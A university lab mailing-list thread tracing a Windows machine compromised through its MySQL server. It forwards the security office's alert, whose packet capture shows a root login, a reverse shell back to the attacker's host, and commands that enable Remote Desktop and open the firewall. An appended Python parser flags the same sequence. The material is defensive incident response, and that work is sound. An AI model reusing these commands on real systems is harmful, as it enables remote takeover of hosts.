[4eyes] [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server
Adam Ibrahim
adam.ibrahim.fr at gmail.com
Fri Jan 20 15:16:15 PST 2017
We found it! IT'S PETER I'M WITH HIM RIGHT NOW I'M GOING TO PRETEND I DON'T KNOW ANY...
On 20 Jan 2017 15:06, "Matthew Turk" <mturk at cs.ucsb.edu> wrote:
> Thanks for checking. Scott said that the MAC address is 00:21:9b:05:e7:48
> and it is a Dell computer. It seems to be currently off but was on
> Wednesday. It should also be a wired connection – unless we have a router
> in the trailer (do we?).
>
>
>
> Matthew
>
>
>
> *From:* Adam Ibrahim [mailto:adam.ibrahim.fr at gmail.com]
> *Sent:* Friday, January 20, 2017 3:00 PM
> *To:* Matthew Turk <mturk at cs.ucsb.edu>
> *Cc:* ilab-users at lists.cs.ucsb.edu
> *Subject:* Re: [4eyes] [COE #74336] [UCSB-OIT #942765] 128.111.28.118:
> was compromised via its MySQL server
>
>
>
> Hey Matthew, we checked all the machines that were on when it happened and
> couldn't find the culprit. There are a couple of machines that have been
> turned off for a week (the ones Brandon and I tried salvaging) but they
> won't boot as there's no OS and one's HDD looks dead. Do they know the MAC
> address of the machine we're looking for? None had that IP, but IPs can
> change, and none was blocked from the network. If it weren't for the HP
> printer drivers I'd suspect someone from outside the lab connected to our wifi.
> Adam
>
>
>
> On 20 Jan 2017 14:51, "Matthew Turk" <mturk at cs.ucsb.edu> wrote:
>
> Update on this: Scott says the machine is in the trailer, and it's a
> Windows machine. So I need someone to please check the IP address of every
> Windows machine in the trailer - looking for 128.111.28.118. I expect there
> are orphaned machines that no one has checked.
>
> Is anyone there this afternoon to do this ASAP?
>
> Thanks,
> Matthew
>
>
> -----Original Message-----
> From: Matthew Turk [mailto:mturk21 at gmail.com] On Behalf Of Matthew Turk
>
> Sent: Thursday, January 19, 2017 5:59 PM
> To: ilab-users at lists.cs.ucsb.edu
> Subject: RE: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was
> compromised via its MySQL server
>
> No one has claimed this machine yet. Please check yours and let me know.
> (There are usual suspects here, but I won't name names!)
>
> Matthew
>
> -----Original Message-----
> From: Matthew Turk [mailto:mturk21 at gmail.com] On Behalf Of Matthew Turk
> Sent: Wednesday, January 18, 2017 9:20 PM
> To: ilab-users at lists.cs.ucsb.edu
> Subject: FW: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was
> compromised via its MySQL server
>
> Whose machine is 128.111.28.118? Please check - if it's yours, please let
> me know and see the info below.
>
> Thanks,
> Matthew
>
> -----Original Message-----
> From: Tier II Support Issues via CoE Support [mailto:
> help at engineering.ucsb.edu]
> Sent: Wednesday, January 18, 2017 10:41 AM
> To: holl at cs.ucsb.edu; mturk at cs.ucsb.edu
> Subject: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised
> via its MySQL server
>
> The following reply has been made regarding CoE Support ticket #74336:
>
> Hi Matt and Tobias,
>
> OIT has sent us this warning about the ilab-118 machine, which is compromised
> and needs to be looked into. Please read the information below.
>
> On Wed Jan 18 10:24:26 2017, security at ucsb.edu wrote:
> > Greetings,
> >
> > 128.111.28.118 has been compromised and has been blocked. The host was
> > compromised via its MySQL server.
> >
> > Before correcting any problems, please consider whether any sensitive
> > personal information is stored on this device. If this device contains
> > personal information and if it appears to have been compromised,
> > please contact the UCSB Chief Information Security Officer, at
> > CISO at oist.ucsb.edu or 893-5005 immediately.
> >
> > To view the UCSB procedures when a device storing personal information
> > has been compromised, please visit:
> > http://www.ets.ucsb.edu/security/sb-1386-and-ab-1298-guideline
> >
> > Please investigate and advise. Here is a sample of traffic from the
> > trojan:
> >
> > ----------sample----------
> > T 2017/01/18 02:45:47.091988 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> > ......
> >
> > T 2017/01/18 02:45:47.497391 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > J...
> > 5.5.11..+..EV``AdUY...!...............B~tMc*DXpHVW.mysql_native_password.
> >
> > T 2017/01/18 02:45:47.684113 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > V.......... at ........................root......Ndy....3......;.mysql.mysql_native_password.
> >
> > T 2017/01/18 02:45:47.684972 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > ...........
> >
> > T 2017/01/18 02:45:47.878832 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > .....SELECT @@max_allowed_packet;
> >
> > T 2017/01/18 02:45:47.899132 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > .....*....def....@@max_allowed_packet..?..........................1048576.........
> >
> > T 2017/01/18 02:45:48.088029 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > .....SHOW VARIABLES LIKE 'VERS%';
> >
> > T 2017/01/18 02:45:48.287569 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [A]
> > ......
> >
> > T 2017/01/18 02:45:48.331489 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > .....T....def.information_schema.VARIABLES.VARIABLES.Variable_name.VARIABLE_NAME... at .........M....def.information_schema.VARIABLES.VARIABLES.Value.VARIABLE_VALUE...................."......version.5.5.11-
> > ....version_comment.MySQL Community Server (GPL).....version_compile_machine.x86.....version_compile_os.Win64.......".
> >
> > T 2017/01/18 02:45:48.682703 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> > ......
> >
> > T 2017/01/18 02:45:50.427705 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > ....USE MYSQL
> >
> > T 2017/01/18 02:45:50.428403 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > ...........
> >
> > T 2017/01/18 02:45:50.613848 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > .....SELECT @@version_compile_os;
> >
> > T 2017/01/18 02:45:50.614481 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > .....*....def....@@version_compile_os............................Win64.........
> >
> > T 2017/01/18 02:45:50.800022 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > .....SELECT @@plugin_dir;
> >
> > T 2017/01/18 02:45:50.800759 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > ....."....def....@@plugin_dir....2..................3...2C:\Program Files\MySQL\MySQL Server 5.5\lib/plugin.........
> >
> > T 2017/01/18 02:45:50.990204 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> > .l...SELECT
> >
> > T 2017/01/18 02:45:54.767136 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [A]
> > ......
> >
> > T 2017/01/18 02:45:55.049876 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > Microsoft Windows [Version 6.1.7601]
> >
> > T 2017/01/18 02:45:55.448211 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:45:55.448772 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > .
> > Copyright (c) 2009 Microsoft Corporation. All rights reserved..
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > T 2017/01/18 02:45:55.776319 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:19.130812 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [AP]
> > ipconfig
> >
> >
> > T 2017/01/18 02:46:19.131472 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > ipconfig
> >
> >
> > T 2017/01/18 02:46:19.304083 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [A]
> > .
> > Windows IP Configuration.
> > .
> > .
> > Ethernet adapter Local Area Connection:.
> > .
> > Connection-specific DNS Suffix . : cs.ucsb.edu.
> > IPv4 Address. . . . . . . . . . . : 128.111.28.118.
> > Subnet Mask . . . . . . . . . . . : 255.255.255.192.
> > Default Gateway . . . . . . . . . : 128.111.28.65.
> > .
> > Ethernet adapter Local Area Connection 2:.
> > .
> > Connection-specific DNS Suffix . : .
> > IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4::1.
> > Link-local IPv6 Address . . . . . : fe80::b57a:afce:a5c3:9380%15.
> > IPv4 Address. . . . . . . . . . . : 10.37.130.2.
> > Subnet Mask . . . . . . . . . . . : 255.255.255.0.
> > Default Gateway . . . . . . . . . : .
> > .
> > Ethernet adapter Local Area Connection 2:.
> > .
> > Connection-specific DNS Suffix . : .
> > IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:1::1.
> > Link-local IPv6 Address . . . . . : fe80::c9a9:464b:1f35:e7b3%17.
> > IPv4 Address. . . . . . . . . . . : 10.37.131.2.
> > Subnet Mask . . . . . . . . . . . : 255.255.255.0.
> > Default Gateway . . . . . . . . . : .
> > .
> > Tunnel adapter isatap.cs.ucsb.edu:.
> > .
> > Media State . . . . . . . . . . . : Media disconnected.
> > Connection-specific DNS Suffix . : cs.ucsb.edu.
> > .
> > Tunnel adapter isatap.{49BB9C41-C060-433B-BF91-9F104E841F11}:.
> > .
> > Media State . . . . . . . . . . . : Media disconnected.
> > Connection-specific DNS Suffix . : .
> > .
> > Tunnel adapter Local Area Connection* 11:.
> > .
> > Media State . . . . . . . . . . . : Media disconnected.
> > Connection-spec
> >
> > T 2017/01/18 02:46:19.304089 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > ific DNS Suffix . : .
> >
> >
> > T 2017/01/18 02:46:19.500202 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:19.500764 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > .
> > Tunnel adapter isatap.{EB59D303-0C84-4EF4-842B-01A57D775715}:.
> > .
> > Media State . . . . . . . . . . . : Media disconnected.
> > Connection-specific DNS Suffix . : .
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > T 2017/01/18 02:46:19.696722 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:44.733187 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [AP]
> > reg.exe ADD
> > "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
> > Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
> >
> >
> > T 2017/01/18 02:46:44.733944 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > reg.exe ADD
> > "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
> > Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
> >
> >
> > T 2017/01/18 02:46:45.104427 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:45.104905 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > The operation completed successfully...
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > T 2017/01/18 02:46:45.432785 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:56.087756 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [AP]
> > netsh advfirewall firewall add rule name = "Windows Service Host"
> > dir=in action=allow protocol=TCP localport=3389
> >
> >
> > T 2017/01/18 02:46:56.088487 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > netsh advfirewall firewall add rule name = "Windows Service Host"
> > dir=in action=allow protocol=TCP localport=3389
> >
> >
> > T 2017/01/18 02:46:56.596211 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:59.117911 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > Ok..
> > .
> >
> > T 2017/01/18 02:46:59.432046 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:46:59.432624 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > .
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > T 2017/01/18 02:46:59.761298 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:47:16.188439 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [AP]
> > net start
> >
> >
> > T 2017/01/18 02:47:16.189037 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > net start
> >
> >
> > T 2017/01/18 02:47:16.385997 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:47:16.427758 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > These Windows services are started:.
> >
> >
> > T 2017/01/18 02:47:16.428404 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [A]
> > .
> > Adobe Acrobat Update Service.
> > AMD External Events Utility.
> > Apple Mobile Device.
> > Application Experience.
> > Application Information.
> > Background Intelligent Transfer Service.
> > Base Filtering Engine.
> > Bonjour Service.
> > Certificate Propagation.
> > COM+ Event System.
> > Computer Browser.
> > Credential Manager.
> > Cryptographic Services.
> > DCOM Server Process Launcher.
> > Desktop Window Manager Session Manager.
> > DHCP Client.
> > Diagnostic Policy Service.
> > Diagnostic Service Host.
> > Diagnostics Tracking Service.
> > Distributed Link Tracking Client.
> > DNS Client.
> > Function Discovery Provider Host.
> > Function Discovery Resource Publication.
> > Group Policy Client.
> > Human Interface Device Access.
> > IKE and AuthIP IPsec Keying Modules.
> > IP Helper.
> > iPod Service.
> > IPsec Policy Agent.
> > LMIGuardianSvc.
> > LogMeIn.
> > LogMeIn Maintenance Service.
> > Microsoft Antimalware Service.
> > Microsoft Network Inspection.
> > Microsoft Office Click-to-Run Service.
> > MT7 Registry Service.
> > MT7 Serial Search Service.
> > MySQL55.
> > Network Connections.
> > Network List Service.
> > Network Location Awareness.
> > Network Store Interface Service.
> > Office Software Protection Platform.
> > Offline Files.
> > Parallels Networking Service.
> > Parallels Virtualization Service.
> > Plug and Play.
> > Pml Driver HPZ12.
> > PnP-X IP Bus Enumerator.
> > Portable Device Enumerator Service.
> > Power.
> > Print Spooler.
> > Program Compati
> >
> > T 2017/01/18 02:47:16.428408 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > bility Assistant Service
> >
> > T 2017/01/18 02:47:16.625665 188.132.176.26:4000 ->
> > 128.111.28.118:20138 [A]
> > ......
> >
> > T 2017/01/18 02:47:16.626533 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [AP]
> > .
> > Quality Windows Audio Video Experience.
> > Remote Access Connection Manager.
> > Remote Desktop Configuration.
> > Remote Desktop Services.
> > Remote Desktop Services UserMode Port Redirector.
> > Remote Procedure Call (RPC).
> > Routing and Remote Access.
> > RPC Endpoint Mapper.
> > Secondary Logon.
> > Secure Socket Tunneling Protocol Service.
> > Security Accounts Manager.
> > Security Center.
> > Server.
> > Shell Hardware Detection.
> > Skype C2C Service.
> > SQL Server (SQLEXPRESS).
> > SQL Server VSS Writer.
> > SSDP Discovery.
> > Superfetch.
> > System Event Notification Service.
> > Tablet PC Input Service.
> > TabletServicePen.
> > Task Scheduler.
> > TCP/IP NetBIOS Helper.
> > TeamViewer 11.
> > Telephony.
> > Themes.
> > UPnP Device Host.
> > User Profile Service.
> > Wacom Consumer Touch Service.
> > Windows App Certification Kit Fast User Switching Utility Service.
> > Windows Audio.
> > Windows Audio Endpoint Builder.
> > Windows Driver Foundation - User-mode Driver Framework.
> > Windows Event Log.
> > Windows Firewall.
> > Windows Font Cache Service.
> > Windows Image Acquisition (WIA).
> > Windows Management Instrumentation.
> > Windows Media Player Network Sharing Service.
> > Windows Presentation Foundation Font Cache 3.0.0.0.
> > Windows Search.
> > Windows Update.
> > WinHTTP Web Proxy Auto-Discovery Service.
> > Workstation.
> > .
> > The command completed successfully..
> > .
> > .
> > C:\ProgramData\MySQL\MySQL Server 5.5\data>
> >
> > ----------sample----------
> > --
> > E. Todd Atkins
> > Enterprise Technology Services
> > University of California, Santa Barbara http://www.security.ucsb.edu/
> >
> > **********************************************************************
> > The NOC's list of network contacts is used to determine who should
> > receive email such as this. Please direct any requests for changes to
> > this list of network contacts to noc at ucsb.edu.
> > **********************************************************************
> >
>
>
> --
>
> Scott Kasai
> User Support Specialist
> Engineering Computing Infrastructure
> University of California, Santa Barbara
>
>
>
>
>
> _______________________________________________
> Ilab-users mailing list
> Ilab-users at lists.cs.ucsb.edu
> https://lists.cs.ucsb.edu/mailman/listinfo/ilab-users
>
>
>
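As an added example, not part of the thread or of OIT's tooling: a small Python parser for the ngrep-style capture format the alert is written in, with detection logic for the sequence the sample records (a root login to MySQL from outside, a `@@plugin_dir` lookup, a PE literal pushed through a SELECT, the host then connecting back to the same address on another port and enabling RDP from the resulting shell). The capture text inside the block is constructed from the alert's timeline, with the headers on one line (the e-mail wrapped them) and the uploaded binary shortened to its MZ marker; the function and variable names are mine.

```python
"""Flag the MySQL-to-shell compromise sequence in an ngrep-style capture."""
import re
from datetime import datetime

# ngrep prints one header per packet, "T <date> <time> <src> -> <dst> [<flags>]",
# followed by the payload and a blank line. The e-mail wrapped the headers onto
# two lines; this parser assumes the original single-line form.
HEADER = re.compile(
    r"^T (\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d+) "
    r"(\S+?):(\d+) -> (\S+?):(\d+) \[(\w+)\]$"
)

# Constructed sample modelled on the alert's timeline (not the original capture):
# root login, plugin_dir lookup, a PE literal in a SELECT, then the host calling
# back to the same address on port 4000 and enabling RDP from the shell.
SAMPLE = """\
T 2017/01/18 02:45:47.684113 188.132.176.26:3549 -> 128.111.28.118:3306 [AP]
V..........@........................root......mysql_native_password.

T 2017/01/18 02:45:50.800022 188.132.176.26:3549 -> 128.111.28.118:3306 [AP]
.....SELECT @@plugin_dir;

T 2017/01/18 02:45:50.990204 188.132.176.26:3549 -> 128.111.28.118:3306 [A]
.l...SELECT 'MZ....This program cannot be run in DOS mode....

T 2017/01/18 02:45:55.049876 128.111.28.118:20138 -> 188.132.176.26:4000 [AP]
Microsoft Windows [Version 6.1.7601]

T 2017/01/18 02:46:44.733187 188.132.176.26:4000 -> 128.111.28.118:20138 [AP]
reg.exe ADD "HKEY_LOCAL_Machine\\System\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f

T 2017/01/18 02:46:56.087756 188.132.176.26:4000 -> 128.111.28.118:20138 [AP]
netsh advfirewall firewall add rule name = "Windows Service Host" dir=in action=allow protocol=TCP localport=3389
"""

MYSQL_PORT = 3306
# Substrings of the two commands in the alert that open the host for RDP.
RDP_MARKERS = ("fDenyTSConnections", "localport=3389")


def parse_capture(text):
    """Return a list of (ts, src, sport, dst, dport, payload) tuples."""
    packets = []
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y/%m/%d %H:%M:%S.%f")
            packets.append([ts, m.group(2), int(m.group(3)),
                            m.group(4), int(m.group(5)), ""])
        elif packets and line.strip():
            packets[-1][5] += line + "\n"   # payload line for the last header
    return [tuple(p) for p in packets]


def analyze(packets, db_host):
    """Return (time, description) findings for the sequence the alert shows."""
    findings = []
    mysql_clients = set()   # remote IPs that talked to the DB port
    callbacks = set()       # (remote_ip, port) flows the DB host opened itself
    for ts, src, sport, dst, dport, payload in packets:
        when = ts.strftime("%H:%M:%S")
        if dst == db_host and dport == MYSQL_PORT:
            mysql_clients.add(src)
            if "mysql_native_password" in payload and "root" in payload:
                findings.append((when, f"root login to MySQL from {src}"))
            if "@@plugin_dir" in payload:
                findings.append((when, f"plugin_dir lookup from {src} (UDF staging)"))
            if re.search(r"SELECT\s+'MZ", payload):
                findings.append((when, f"PE image sent inside a query from {src}"))
        elif (src == db_host and sport != MYSQL_PORT      # not a server reply
              and dst in mysql_clients and (dst, dport) not in callbacks):
            callbacks.add((dst, dport))
            findings.append((when, f"DB host connected back to {dst}:{dport} (reverse shell)"))
        if dst == db_host and src in mysql_clients and any(k in payload for k in RDP_MARKERS):
            cmd = payload.split()[0]
            findings.append((when, f"RDP enabled from the shell via {cmd}"))
    return findings


if __name__ == "__main__":
    for when, what in analyze(parse_capture(SAMPLE), "128.111.28.118"):
        print(when, what)
```

The same four checks map directly onto what the alert's capture shows, so running the parser over a real ngrep dump of a MySQL host (with the two-line headers rejoined) gives the timeline OIT sent, minus the binary.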